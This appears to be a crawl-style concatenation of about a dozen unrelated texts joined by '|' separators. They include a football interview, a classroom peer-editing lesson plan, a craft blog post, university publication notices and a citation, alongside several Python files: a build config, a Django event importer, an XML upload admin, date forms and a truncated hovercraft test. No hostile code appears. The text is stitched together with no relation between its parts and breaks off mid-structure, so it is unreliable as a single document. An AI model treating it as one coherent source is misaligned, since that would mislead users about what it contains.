“I’m on top if it now, but there was no rule book there for me to read!
“I’ve had to pick up the rules as I’ve gone along with Pat (Bamford)!"
Hendrick is now facing a challenge of a different kind ahead of the Clarets trip to Leicester City this weekend.
New players are usually asked to perform a song in front of the squad of their first away game.
But the former Derby County midfield ace is happy to go with the flow ahead of what he hopes will be a full debut at the King Power Stadium.
He said: ““If the lads want me to sing a song, I’ll do that.
He added: “The first week here has been hard work and I was told it would be, but I’ve enjoyed it.
“I know I am going to get fitter here and I’m going to have to work hard.
“I enjoyed the 10 minutes (against Hull) and it would have been a good start to get the three points, but hopefully I can be a part of that in the coming weeks.
“I’ve played against Leicester a few times in the Championship and had a few heavy defeat at their place over the years, but I watched them last year and I think everyone was rooting for them.
“They have done well, but I think they might find it hard this year.
Clarets Player HD will have full match commentary from The King Power Stadium tomorrow, with Dave Roberts joining Phil Bird behind the mic. CLICK HERE FOR MORE DETAILS.
|
"""Extra configuration for build"""
class ConfigBuild:
"""Build configuration"""
#: Disable compilertools's optimization while building
disabled = False
#: Compiles optimized for current machine only (If not compile for a cluster of
#: possibles machines)
#: True or False for manually set value; 'autodetect' for automatically set value to
#: True if build from PIP
current_machine = "autodetect"
#: Enabled suffixes in files matrix definition.
#: If this set is not empty, includes only suffixes specified inside it.
#: This does not affect current machine builds.
suffixes_includes = set()
#: Disabled suffixes in files matrix definition.
#: If 'suffixes_includes' is empty, completes this set to not build files for a
#: specific architecture.
#: This does not affect current machine builds.
suffixes_excludes = {
"sse",
"ssse3",
"sse4_1",
"sse4_2",
"intel_atom",
"intel",
"amd",
}
#: Enables compilers options
option = {
# Enables Fast floating point math
"fast_fpmath": False
}
#: Specific API are auto-enabled when compiling and linking if following
#: preprocessors are detected in source files
api = {
# openMP
"openmp": {"c": "#pragma omp ", "fortran": ("!$omp ", "c$omp ", "*$omp ")},
# OpenACC
"openacc": {"c": "#pragma acc ", "fortran": ("!$acc ", "c$acc ", "*$acc ")},
# Intel Cilk Plus
"cilkplus": {"c": "#pragma simd ", "fortran": "!dir$ simd "},
}
#: Sources files extensions for code analysis
extensions = {
#: C/C++ sources files extensions
"c": (".c", ".cpp", ".cxx", ".cc", ".c++", ".cp"),
#: Fortran sources files extensions
"fortran": (".f", ".for", ".f90", ".f95", ".f03", ".f08", ".f15"),
}
|
SWBAT use their peers to help them edit and revise their writing in order to help focus on how well the components of the memoir unit have been addressed.
1) Give my draft that I want to publish with my rubric to my writing partner.
2) Ask them to look for something specific that I would like help with.
3) Accept my partner’s second opinion, but also follow the rubric.
I will ask for a student volunteer to help model this with me. I will show them how I give my draft to a student and ask them to look for something specific (using sensory details for example).
Active Engagement: I will say,” Give your draft and rubric to your writing partner."
See (setting students up for success with writing partners) for an explanation of how I set partnerships up.
"You will now have a short conversation with your assigned writing partner about what you want them to look for in your writing. Decide who will be partner A and who will be partner B. Partner A, I want to hear your say the following prompt; “I would like you to give me feedback on….” Partner B, listen to your partner and put a star on the part of the rubric that your partner has asked you to look for. Then switch.” I will check for understanding by asking every level of learner what they heard their partner say (at least 3 students-one who is at standard, one is approaching standard, and one who is above standard). I am listening to see that they really understood their partner and used the rubric language.
Closing of Active Engagement: I will say, “Remember in order to get another person’s opinion on my writing; I am going to practice the skill of getting a second opinion on my writing and the strategy of utilizing a peer editor. The process writer’s use is they give their draft to a peer and ask them to look for something specifically. They accept their partner’s feedback, but also use what they know about good writing.
Independent Practice: I will say, “Now you are going to read over your partner’s work. I should not hear talking, because if you do not understand a part of your partner’s writing, then write your questions on the rubric. Just like with real authors, if we don’t understand their stories, we can’t call them up and ask them. In order to thoroughly read their partner’s writing and leave comments for every part of the rubric, this should take at least 20 minutes. As they are working independently and quietly, (I like to play classical or smooth jazz for“writing”music (I just create a play list on Pandora Internet radio) I will confer with them about their writing using the attached possible conferences for peer editing.
Closing: For closing today I will do a whole class share out. I will ask the class, “What do you need to edit and revise for in your paper for homework tonight?” I will check for understanding by asking every level of learner what they heard their partner say (at least 3 students-one who is at standard, one is approaching standard, and one who is above standard). I will tell students that for homework they must edit and revise their papers based on their partner’s feedback. They must come tomorrow ready to write their published draft.
|
import logging
import traceback
from collections import namedtuple
from copy import deepcopy
from datetime import datetime, timedelta
from functools import lru_cache, partial
import pytz
import requests
from django.db import transaction
from django.utils.dateparse import parse_time
from django.utils.timezone import now
from django_orghierarchy.models import Organization
from events.importer.sync import ModelSyncher
from events.importer.util import clean_text
from events.importer.yso import KEYWORDS_TO_ADD_TO_AUDIENCE
from events.keywords import KeywordMatcher
from events.models import DataSource, Event, Keyword, Place
from .base import Importer, register_importer
# Per module logger
logger = logging.getLogger(__name__)
HARRASTUSHAKU_API_BASE_URL = 'http://nk.hel.fi/harrastushaku/api/'
TIMEZONE = pytz.timezone('Europe/Helsinki')
MAX_RECURRING_EVENT_LENGTH = 366 # days
MAIN_CATEGORY_KEYWORDS = {
'1': {'yso:p3466'},
'2': {'yso:p916', 'yso:p6062'},
'3': {'yso:p13084', 'yso:p2023'},
'4': {'yso:p2445', 'yso:p20405'},
'5': {'yso:p1808'},
'7': {'yso:p2851'},
'8': {'yso:p1278'},
'9': {'yso:p6940'},
'11': {'yso:p143', 'yso:p9270'},
}
AUDIENCE_BY_AGE_RANGE = (
((0, 6), {'yso:p4354'}),
((7, 16), {'yso:p16485'}),
((10, 18), {'yso:p11617'}),
)
SubEventTimeRange = namedtuple('SubEventTimeRange', ['start', 'end'])
class HarrastushakuException(Exception):
pass
@register_importer
class HarrastushakuImporter(Importer):
name = 'harrastushaku'
supported_languages = ['fi']
def setup(self):
logger.debug('Running Harrastushaku importer setup...')
self.data_source, _ = DataSource.objects.get_or_create(id=self.name, defaults={'name': 'Harrastushaku'})
self.tprek_data_source = DataSource.objects.get(id='tprek')
self.ahjo_data_source, _ = DataSource.objects.get_or_create(id='ahjo', defaults={'name': 'Ahjo'})
self.organization, _ = Organization.objects.get_or_create(origin_id='u48040030',
data_source=self.ahjo_data_source)
self.tprek_ids = {place.origin_id for place in Place.objects.filter(data_source=self.tprek_data_source)}
self.keywords = {keyword.id: keyword for keyword in Keyword.objects.all()}
self.keyword_matcher = KeywordMatcher()
def import_places(self):
"""Import Harrastushaku locations as Places
- If we can find a close-enough match for the location object coming from Harrastushaku in Toimipisterekisteri,
we do not import that location object, as this this will cause duplicate location issue due to
Harrastushaku data being of low quality.
- If, however, we cannot find a match, location object will be imported with data source "harrastushaku".
"""
logger.info('Importing places...')
locations = self.fetch_locations()
logger.debug('Handling {} locations...'.format(len(locations)))
self.location_id_to_place_id = self.map_harrastushaku_location_ids_to_tprek_ids(locations)
for location in locations:
try:
self.handle_location(location)
except Exception as e: # noqa
message = e if isinstance(e, HarrastushakuException) else traceback.format_exc()
logger.error('Error handling location {}: {}'.format(location.get('id'), message))
def map_harrastushaku_location_ids_to_tprek_ids(self, harrastushaku_locations):
'''
Example mapped dictionary result:
{
'95': 'harrastushaku:95',
'953': 'harrastushaku:953',
'968': 'tprek:20479',
'97': 'tprek:8062',
'972': 'tprek:9079',
'987': 'harrastushaku:987',
'99': 'tprek:8064',
}
'''
result = dict()
for harrastushaku_location in harrastushaku_locations:
harrastushaku_location_id = harrastushaku_location['id']
strict_filters = {
'id__startswith': self.tprek_data_source,
'name': harrastushaku_location['name'],
'address_locality': harrastushaku_location['city'],
'postal_code': harrastushaku_location['zip'],
'street_address': harrastushaku_location['address'],
}
flexible_filters = {
'id__startswith': self.tprek_data_source,
'address_locality': harrastushaku_location['city'],
'postal_code': harrastushaku_location['zip'],
'street_address': harrastushaku_location['address'],
}
tprek_place = (Place.objects.filter(**strict_filters).first() or
Place.objects.filter(**flexible_filters).first())
if tprek_place:
result[harrastushaku_location_id] = tprek_place.id
else:
result[harrastushaku_location_id] = '{}:{}'.format(self.data_source.id, harrastushaku_location_id)
return result
def import_courses(self):
"""Import Harrastushaku activities as Courses
Activities having "active" anything else than "1" or "K" will be
ignored.
When importing and an existing course isn't present in imported data:
- If the course's end time is in the past, the course will be left as
it is.
- If the course's end time is not in the past, the course will be soft
deleted alongside its sub events.
If an activity has something in field "timetables", it will be imported
as a recurring event, otherwise as a one-time event.
A recurring course will have a super event which includes the course's
whole time period, and sub events which will represent individual course
occurrences. Other than start and end times, a super event and its sub
events will all contain the same data.
A recurring course's sub event start and end datetimes will be build using
the activity's "timetables". The time tables contain info out weekday,
times, and repetition which means number of days there is between
occurrences (basically a multiple of 7).
A recurring course's sub events will be given an ID that has the
activity's ID and start and end times of the sub event in a compressed
form. This also means that between imports only sub events that are
happening exactly at the same time are considered to be the same instance,
so if a sub event's begin or end time changes at all, a new sub event will
be created instead of updating an old one (because there is no unambiguous
way to determine which old sub event the new one corresponds to).
A course's keywords will come from both of the following:
- The activity's main category. There are hardcoded keywords for every
main category.
- The activity's sub category's "searchwords". Those are manually
entered words, which are mapped to keywords using KeywordMatcher
(from events.keywords).
A course's audience will come from both of the following:
- The activity's "audience_max_age" and "audience_min_age" using
hardcoded keywords for certain age ranges.
- The course's keywords, adding the ones that are present in
KEYWORDS_TO_ADD_TO_AUDIENCE (from events.importer.yso).
"""
logger.info('Importing courses...')
locations = self.fetch_locations()
if not locations:
logger.warning('No location data fetched, aborting course import.')
return
self.location_id_to_place_id = self.map_harrastushaku_location_ids_to_tprek_ids(locations)
activities = self.fetch_courses()
if not activities:
logger.info('No activity data fetched.')
return
def event_delete(event):
if event.end_time < now():
return
event.soft_delete()
for sub_event in event.sub_events.all():
sub_event.soft_delete()
self.event_syncher = ModelSyncher(
Event.objects.filter(data_source=self.data_source, super_event=None),
lambda event: event.id,
event_delete,
)
num_of_activities = len(activities)
logger.debug('Handling {} activities...'.format(num_of_activities))
for i, activity in enumerate(activities, 1):
try:
self.handle_activity(activity)
except Exception as e: # noqa
message = e if isinstance(e, HarrastushakuException) else traceback.format_exc()
logger.error('Error handling activity {}: {}'.format(activity.get('id'), message))
if not i % 10:
logger.debug('{} / {} activities handled.'.format(i, num_of_activities))
self.event_syncher.finish(force=True)
logger.info('Course import finished.')
def fetch_locations(self):
logger.debug('Fetching locations...')
try:
url = '{}location/'.format(HARRASTUSHAKU_API_BASE_URL)
response = requests.get(url)
response.raise_for_status()
return response.json()
except requests.RequestException as e:
logger.error('Cannot fetch locations: {}'.format(e))
return []
def fetch_courses(self):
logger.debug('Fetching courses...')
try:
url = '{}activity/'.format(HARRASTUSHAKU_API_BASE_URL)
response = requests.get(url)
response.raise_for_status()
return response.json()['data']
except requests.RequestException as e:
logger.error('Cannot fetch courses: {}'.format(e))
return []
@transaction.atomic
def handle_location(self, location_data):
harrastushaku_location_id = location_data.get('id')
harrastushaku_location_mapped_id = self.location_id_to_place_id.get(harrastushaku_location_id)
if harrastushaku_location_mapped_id.startswith(self.tprek_data_source.id):
return
else:
self.handle_non_tprek_location(location_data)
def handle_non_tprek_location(self, location_data):
get_string = bind_data_getters(location_data)[0]
place_data = {
'name': get_string('name', localized=True),
'info_url': get_string('url', localized=True),
'street_address': get_string('address', localized=True),
'address_locality': get_string('city', localized=True),
'postal_code': get_string('zip'),
'data_source': self.data_source,
'origin_id': location_data['id'],
'publisher': self.organization,
}
self.save_place(place_data)
@transaction.atomic
def handle_activity(self, activity_data):
if activity_data.get('active') not in ('1', 'K'):
logger.debug('Skipping inactive activity {}'.format(activity_data.get('id')))
return
event_data = self.get_event_data(activity_data)
if event_data['start_time'] > event_data['end_time']:
raise HarrastushakuException('Start time after end time')
time_tables = activity_data.get('timetables', [])
if time_tables:
self.handle_recurring_event(event_data, time_tables)
else:
self.handle_one_time_event(event_data)
def create_registration_links(self, activity_data):
# Harrastushaku has own registration links which should be created in the imported events as well
if activity_data.get('regavailable', 0) and '1' in activity_data['regavailable']:
# regstart and regend sometimes take "false" value which seem to mean in the cases regavailable=='1' that
# the registration is going on indefinitely
reg_start = activity_data['regstartdate'] if isinstance(activity_data['regstartdate'], int) else 0
reg_end = activity_data['regenddate'] if isinstance(activity_data['regenddate'], int) else 9999999999
if datetime.utcfromtimestamp(reg_start) <= datetime.utcnow() <= datetime.utcfromtimestamp(reg_end):
return {'fi': {'registration': f"https://harrastushaku.fi/register/{activity_data['id']}"}}
return ''
def get_event_data(self, activity_data):
get_string, get_int, get_datetime = bind_data_getters(activity_data)
keywords = self.get_event_keywords(activity_data)
audience = self.get_event_audiences_from_ages(activity_data) | self.get_event_audiences_from_keywords(keywords)
keywords |= audience
event_data = {
'name': get_string('name', localized=True),
'description': get_string('description', localized=True),
'audience_max_age': get_int('agemax'),
'audience_min_age': get_int('agemin'),
'start_time': get_datetime('startdate'),
'end_time': get_datetime('enddate'),
'date_published': get_datetime('publishdate'),
'external_links': self.create_registration_links(activity_data),
'organizer_info': self.get_organizer_info(activity_data),
'extension_course': {
'enrolment_start_date': get_datetime('regstartdate'),
'enrolment_end_date': get_datetime('regenddate'),
'maximum_attendee_capacity': get_int('maxentries'),
'remaining_attendee_capacity': get_int('regavailable'),
},
'data_source': self.data_source,
'origin_id': activity_data['id'],
'publisher': self.organization,
'location': self.get_event_location(activity_data),
'keywords': keywords,
'in_language': self.get_event_languages(activity_data),
'images': self.get_event_images(activity_data),
'offers': self.get_event_offers(activity_data),
'audience': audience,
}
return event_data
def handle_recurring_event(self, event_data, time_tables):
start_date, end_date = self.get_event_start_and_end_dates(event_data)
if not start_date:
raise HarrastushakuException('No start time')
if not end_date:
raise HarrastushakuException('No end time')
if end_date - start_date > timedelta(days=MAX_RECURRING_EVENT_LENGTH):
raise HarrastushakuException('Too long recurring activity')
sub_event_time_ranges = self.build_sub_event_time_ranges(start_date, end_date, time_tables)
if not sub_event_time_ranges:
raise HarrastushakuException('Erroneous time tables: {}'.format(time_tables))
super_event = self.save_super_event(event_data)
self.save_sub_events(event_data, sub_event_time_ranges, super_event)
def handle_one_time_event(self, event_data):
event_data['has_start_time'] = False
event_data['has_end_time'] = False
event = self.save_event(event_data)
self.event_syncher.mark(event)
def get_event_keywords(self, activity_data):
keywords = (self.get_event_keywords_from_main_categories(activity_data) |
self.get_event_keywords_from_search_words(activity_data))
return keywords
def get_event_keywords_from_main_categories(self, activity_data):
main_category_ids = {c.get('maincategory_id') for c in activity_data.get('categories', [])}
keyword_ids = set()
for main_category_id in main_category_ids:
keyword_ids |= MAIN_CATEGORY_KEYWORDS.get(main_category_id, set())
return {self.keywords.get(kw_id) for kw_id in keyword_ids if kw_id in self.keywords}
def get_event_keywords_from_search_words(self, activity_data):
keywords = set()
search_words = activity_data.get('searchwords', [])
cleaned_search_words = [s.strip().lower() for s in search_words.split(',') if s.strip()]
for kw in cleaned_search_words:
matches = self.match_keyword(kw)
if matches:
keywords |= set(matches)
return keywords
def get_event_languages(self, activity_data):
language_text = activity_data.get('languages', '').lower()
languages = {obj for code, obj in self.languages.items() if obj.name_fi and obj.name_fi in language_text}
return languages
def get_event_start_and_end_dates(self, event_data):
start_datetime = event_data.get('start_time')
start_date = start_datetime.date() if start_datetime else None
end_datetime = event_data.get('end_time')
end_date = end_datetime.date() if end_datetime else None
return start_date, end_date
def get_organizer_info(self, activity_data):
org_details = clean_text(activity_data.get('organiserdetails', ''), strip_newlines=True, parse_html=True)
reg_details = clean_text(activity_data.get('regdetails', ''), strip_newlines=True, parse_html=True)
return {'fi': f'{reg_details} {org_details}'.strip()} if org_details or reg_details else ''
def build_sub_event_time_ranges(self, start_date, end_date, time_tables):
sub_event_time_ranges = []
for time_table in time_tables:
current_date = start_date
weekday = int(time_table.get('weekday'))
start_time = parse_time(time_table.get('starttime'))
end_time = parse_time(time_table.get('endtime'))
repetition = int(time_table.get('repetition'))
if repetition == 0:
repetition = 7 # assume repetition 0 and 7 mean the same thing
if not (weekday and repetition) or start_time >= end_time:
continue
while current_date.isoweekday() != weekday:
current_date += timedelta(days=1)
while current_date <= end_date:
sub_event_time_ranges.append(SubEventTimeRange(
datetime.combine(current_date, start_time).astimezone(TIMEZONE),
datetime.combine(current_date, end_time).astimezone(TIMEZONE),
))
current_date += timedelta(days=repetition)
return sub_event_time_ranges
def save_super_event(self, event_data):
super_event_data = deepcopy(event_data)
super_event_data['super_event_type'] = Event.SuperEventType.RECURRING
event = self.save_event(super_event_data)
self.event_syncher.mark(event)
return event
def save_sub_events(self, event_data, sub_event_time_ranges, super_event):
super_event._changed = False
def delete_sub_event(obj):
logger.debug('{} deleted'.format(obj))
obj.deleted = True
obj.save()
sub_event_syncher = ModelSyncher(
super_event.sub_events.filter(deleted=False), lambda o: o.id, delete_func=delete_sub_event)
sub_event_data = deepcopy(event_data)
sub_event_data['super_event'] = super_event
for sub_event_time_range in sub_event_time_ranges:
sub_event_data['start_time'] = sub_event_time_range.start
sub_event_data['end_time'] = sub_event_time_range.end
sub_event_data['origin_id'] = (
event_data['origin_id'] + self.create_sub_event_origin_id_suffix(sub_event_time_range))
sub_event = self.save_event(sub_event_data)
if sub_event._changed:
super_event._changed = True
sub_event_syncher.mark(sub_event)
old_sub_event_count = super_event.sub_events.count()
sub_event_syncher.finish(force=True)
if super_event.sub_events.count() != old_sub_event_count:
super_event._changed = True
if super_event._changed:
super_event.save()
def create_sub_event_origin_id_suffix(self, sub_event_time_range):
start, end = sub_event_time_range
assert start.date() == end.date()
date = start.date().strftime('%Y%m%d')
times = '{}{}'.format(*(time.time().strftime('%H%M') for time in (start, end)))
return '_{}{}'.format(date, times)
def get_event_images(self, activity_data):
image_data = activity_data.get('images')
if not isinstance(image_data, dict):
return []
event_image_data = [{
'name': image_datum.get('name', ''),
'url': image_datum.get('filename', ''),
} for image_datum in image_data.values()]
return event_image_data
def get_event_location(self, activity_data):
location_id = activity_data.get('location_id')
if not location_id:
return None
return {'id': self.location_id_to_place_id.get(location_id)}
def get_event_offers(self, activity_data):
offers = []
for price_data in activity_data.get('prices', ()):
get_string = bind_data_getters(price_data)[0]
price = get_string('price', localized=False)
description = get_string('description', localized=True)
is_free = price is not None and price == '0'
if not description and len(activity_data['prices']) == 1:
description = get_string('pricedetails', localized=True)
offers.append({
'price': price if not is_free else None,
'is_free': is_free,
'description': description,
})
return offers
def get_event_audiences_from_ages(self, activity_data):
audience_keyword_ids = set()
age_min = get_int_from_data(activity_data, 'agemin') or 0
age_max = get_int_from_data(activity_data, 'agemax') or 200
for age_range, keyword_ids in AUDIENCE_BY_AGE_RANGE:
if ranges_overlap(age_min, age_max, age_range[0], age_range[1]):
audience_keyword_ids |= keyword_ids
return {self.keywords.get(k_id) for k_id in audience_keyword_ids if k_id in self.keywords}
def get_event_audiences_from_keywords(self, keywords):
return {kw for kw in keywords if kw.id in KEYWORDS_TO_ADD_TO_AUDIENCE}
@lru_cache()
def match_keyword(self, text):
return self.keyword_matcher.match(text)
def get_string_from_data(data, field, localized=False):
value = data.get(field)
if not isinstance(value, str):
return None
value = clean_text(value)
if not value:
return None
return {'fi': value} if localized else value
def get_int_from_data(data, field):
value = data.get(field)
if value in (None, False, ''):
return None
return int(value)
def get_datetime_from_data(data, field):
value = data.get(field)
if value in (None, False, ''):
return None
return datetime.utcfromtimestamp(int(value)).replace(tzinfo=pytz.utc).astimezone(TIMEZONE)
def bind_data_getters(data):
get_string = partial(get_string_from_data, data)
get_int = partial(get_int_from_data, data)
get_datetime = partial(get_datetime_from_data, data)
return get_string, get_int, get_datetime
def ranges_overlap(x1, x2, y1, y2):
return x1 <= y2 and y1 <= x2
|
Craig McLauchlan and Marjorie Jones, CHE, co-authored “An Additional Method for Analyzing the Reversible Inhibition of an Enzyme” for Current Enzyme Inhibition.
Timothy Lash and Gregory Ferrence, CHE, co-authored “adj-Dicarbachlorin, the First Example of a Free Base Carbaporphyrinoid System with an Internal Methylene Unit,” in Chemical Communications.
William Bohn, LAN emeritus, published an article titled “Apollinaire d’un port a l’autre” in Apollinaire: Revue d’Etudes Apollinariennes.
T.Y. Wang, POL, presented a co-authored paper titled “Taiwan Citizens’ Views of China: What Are the Effects of Cross-Strait Contacts?” at A New Era in Taiwan: Domestic and International Implications, a conference at the University of Texas at Austin.
Julie Schumacher, FCS, and Jackie Lanier, HSC, presented “Best-Practice Grant Writing Strategies of Registered Dietitian Nutritionists to Establish and Support Community Coalitions,” at the National Food & Nutrition Conference and Expo for the Academy of Nutrition and Dietetics in Nashville, Tennessee.
Susan Burt, ENG, presented “Person-Referring Expressions, Reference Nominals, and Address Nominals: Explorations in a Small Local Corpus” the Third International Conference of the International Network on Address Research, at Texas A and M University, College Station, Texas.
Angela Haas, ENG, presented “Toward a Decolonial Feminist Operating System for Digital Rhetoric Studies” at the Feminisms & Rhetorics Conference at Arizona State University.
|
# wrouted.py
#
# Copyright (C) 2013 Yi-Wei Ci <ciyiwei@hotmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
from poller import WRoutePoller
from worker import WRouteWorker
import sys
sys.path.append('../../lib')
from default import WROUTE_ROLE
if __name__ == '__main__':
if WROUTE_ROLE != 1:
poller = WRoutePoller()
poller.run()
if WROUTE_ROLE != 0:
worker = WRouteWorker()
worker.start()
worker.join()
if WROUTE_ROLE != 1:
poller.join()
|
I think blogger is still having problems. For some reason it will only display on post at a time on my front page. You will have to click on Older Posts to see the rest of my posts for now, unless when I publish this post it corrects the problem. I also think they are hard to get in contact with when asking about problems, but since they are free I can't complain to much.
Onto the card above. The sketch is straight forward, I didn't veer. The challenge at Our Creative Corner takes a little bit of explanation. The girls over there really keep us creating out side our boxes.
OOPS! Look at the time--off to finish the rest of the day. My Mom says she needs a Taco Bell fix, so we'll have dinner in her room and visit til she goes to bed. July 12th is the target date for her to come home from the nursing home. She has really made major improvements in the last month. Thanks for all the prayers and well wishes you've sent my way during the last 3 months.
Pick up a subscription while you are there and check out the challenges in the back and how to get published and we see you too in a future issue.
Supplies: 4" X 5 1/2" Soft Suede card blank, Papers: SU-Soft Suede, Regal Rose, Rich Razzleberry, Designer Series Paper Paisley Petals, Naturals White, Stamps: SU-Build a Blossom, So Happy for You, Ink: SU-Regal Rose, Rich Razzleberry, Baja Breeze, Fiskars corner rounder, SU punches-Scallop Trim, Ex.Lg. Blossom Petals, 1/2" circle, ribbon unknown, glue dots.
This is a beautiful card, love the flower. And it is very good news about your Mum. All the best.
Congrats on being featured AND published, and Blogger is letting more than one post show at a time so fantastic news all around LOL!
Great colors! Bold and beautiful.
Great love that big flower. Glad you joined us at cardpatterns.
|
import xml.etree.cElementTree as etree
from django.contrib import admin
from django.shortcuts import get_object_or_404
from multiupload.admin import MultiUploadAdmin
from indicator.upload_indicators_helper import find_country, find_city, get_countries, get_cities, get_value, save_log, save_city_data, save_country_data
from indicator_unesco.models import UnescoIndicatorData, UnescoIndicator
from translation_model.models import TranslationModel
class UnescoIndicatorDataUploadAdmin(MultiUploadAdmin):
list_display = ['unesco_indicator','country', 'value']
search_fields = ['unesco_indicator']
list_filter = ['unesco_indicator', 'country']
# default value of all parameters:
change_form_template = 'multiupload/change_form.html'
change_list_template = 'multiupload/change_list.html'
multiupload_template = 'multiupload/upload_unesco.html'
# if true, enable multiupload on list screen
# generaly used when the model is the uploaded element
multiupload_list = True
# if true enable multiupload on edit screen
# generaly used when the model is a container for uploaded files
# eg: gallery
# can upload files direct inside a gallery.
multiupload_form = True
# max allowed filesize for uploads in bytes
multiupload_maxfilesize = 3 * 2 ** 20 # 3 Mb
# min allowed filesize for uploads in bytes
multiupload_minfilesize = 0
# tuple with mimetype accepted
multiupload_acceptedformats = ("text/xml",)
def process_uploaded_file(self, uploaded, object,request, **kwargs):
'''
This method will be called for every csv file uploaded.
Parameters:
:uploaded: instance of uploaded file
:object: instance of object if in form_multiupload else None
:kwargs: request.POST received with file
Return:
It MUST return at least a dict with:
{
'url': 'url to download the file',
'thumbnail_url': 'some url for an image_thumbnail or icon',
'id': 'id of instance created in this method',
'name': 'the name of created file',
}
'''
line_counter = 0
country_found = []
country_not_found = []
total_items_saved = 0
countries = get_countries()
#getting the title of the file
title = kwargs.get('title', [''])[0] or uploaded.name
xmlDoc = uploaded
xmlDocData = xmlDoc.read()
xmlDocTree = etree.XML(xmlDocData)
for indicator in xmlDocTree.iter('CountryId'):
indicator_name_en = indicator[1].text.rstrip()
indicator_name_fr = indicator[2].text.rstrip()
indicator_country = indicator[0].text.rstrip()
country_iso = indicator.get('countryid').rstrip()
value = indicator[3].text.rstrip()
type_value = None
try:
website_en = indicator[4].text.rstrip()
website_fr = indicator[5].text.rstrip()
except IndexError:
website_en = None
website_fr = None
#try to find the indicator that is uploaded or create a new one
indicator_from_db = UnescoIndicator.objects.get_or_create(id=indicator_name_en)[0]
#getting country from our database
country_from_db = find_country(country_name=indicator_country, countries=countries, iso2=country_iso)
#add country to the log array
if country_from_db:
country_found.append(indicator_country)
else:
if indicator_country:
country_not_found.append(indicator_country)
#saving the unesco indicator data
if country_from_db:
indicator_data_from_db = UnescoIndicatorData.objects.get_or_create(unesco_indicator=indicator_from_db, country=country_from_db, value=value)[0]
#storing the translation of the indicator
TranslationModel.objects.get_or_create(key=indicator_name_en, language='en', translation=indicator_name_en)
TranslationModel.objects.get_or_create(key=indicator_name_en, language='fr', translation=indicator_name_fr)
if website_en:
indicator_data_from_db.website = website_en
indicator_data_from_db.save()
#we need to store the translations as well
TranslationModel.objects.get_or_create(key=website_en, language='en', translation=website_en)
TranslationModel.objects.get_or_create(key=website_en, language='fr', translation=website_fr)
total_items_saved += 1
line_counter += 1
log = save_log(file=uploaded,
uploaded_by_user=request.user,
cities_not_found=[],
countries_not_found=country_not_found,
total_cities_found=[],
total_countries_found=country_found,
total_cities_not_found=[],
total_countries_not_found=country_not_found,
total_items_saved=total_items_saved
)
return {
'url': '/admin/indicator/csvuploadlog/%s/' % str(log.id),
'thumbnail_url': '',
'id': str(log.id),
'name' : title,
'country_not_found' : log.countries_not_found,
'total_countries_not_found' : country_not_found.__len__(),
'city_not_found' : log.cities_not_found,
'total_cities_not_found' : 0,
'total_items_saved' : str(total_items_saved),
}
def delete_file(self, pk, request):
'''
Function to delete a file.
'''
# This is the default implementation.
obj = get_object_or_404(self.queryset(request), pk=pk)
obj.delete()
admin.site.register(UnescoIndicatorData, UnescoIndicatorDataUploadAdmin)
admin.site.register(UnescoIndicator)
|
Now THIS is a cool outdoor bathroom. No, it’s not Hef’s grotto. It’s from FaeMagazine. We’ve got a couple of outdoor bathtubs with hot and cold running water but what I love about this particular one is the stone surround and the plants. Next summer I’m going to have to do more landscaping, methinks.
|
import time
import json
import moment
from datetime import datetime
from django import forms
from base.models import sensors, controller_setpoints
from django.utils.translation import ugettext_lazy as _
from bootstrap3_datetime.widgets import DateTimePicker
# class DateForm(forms.Form):
# start_date = forms.DateField(
# widget=DateTimePicker())
# end_date = forms.DateField(
class DateForm(forms.Form):
end = sensors.objects.latest('time')
end_time = datetime.fromtimestamp(
int(end.time)).strftime('%Y-%m-%d %H:%M')
start = sensors.objects.earliest('time')
start_time = datetime.fromtimestamp(
int(start.time)).strftime('%Y-%m-%d %H:%M')
start_date = forms.DateTimeField(
widget=DateTimePicker(options={"format": "YYYY-MM-DD HH:mm",
"locale": "en",
"minDate": start_time,
"maxDate":end_time,
"defaultDate": start_time,
"sideBySide": True}))
end_date = forms.DateTimeField(
widget=DateTimePicker(options={"format": "YYYY-MM-DD HH:mm",
"locale": "en",
"minDate": start_time,
"maxDate":end_time,
"defaultDate":end_time,
"sideBySide": True}))
class ControlForm(forms.ModelForm):
lights_on = forms.TimeField(
widget=DateTimePicker(options={"format": "HH:mm",
"locale":"en",
"pickDate":0}))
lights_off = forms.TimeField(
widget=DateTimePicker(options={"format": "HH:mm",
"locale":"en",
"pickDate":0}))
class Meta:
model = controller_setpoints
fields = ['humidity','r1_water','r2_water','r3_water','water_frequency','lights_on','lights_off']
labels = {
"humidity":_("Relative Percent Humidity"),
"r1_water":_("Number of Seconds to Water Row 1"),
"r2_water":_("Number of Seconds to Water Row 2"),
"r3_water":_("Number of Seconds to Water Row 3"),
"water_frequency":_("How often to water in minutes"),
"lights_on":_("What time of day to start the lights"),
"lights_off":_("What time of day to turn off the lights")
}
|
"." SIPRI Yearbook. SIPRI. Oxford: Oxford University Press. 2016. Web. 24 Apr. 2019. <https://www.sipriyearbook.org/view/9780198737810/sipri-9780198737810-miscMatter-5.xml>.
|
import os
import unittest
from pkg_resources import resource_string
from lxml import etree
from hovercraft.parse import rst2xml, SlideMaker
from hovercraft.position import gather_positions, calculate_positions, position_slides
TEST_DATA = os.path.join(os.path.split(__file__)[0], "test_data")
def make_tree(file_name):
"""Loads reStructuredText, outputs an lxml tree"""
rst = resource_string(__name__, os.path.join("test_data", file_name))
xml, deps = rst2xml(rst)
return SlideMaker(etree.fromstring(xml)).walk()
class GatherTests(unittest.TestCase):
"""Tests that position information is correctly parsed"""
def test_gathering(self):
tree = make_tree("positioning.rst")
positions = list(gather_positions(tree))
self.assertEqual(
positions,
[
{
"data-x": "r0",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "1",
"is_path": False,
},
{
"data-x": "r1600",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": False,
},
{
"data-x": "r1600",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
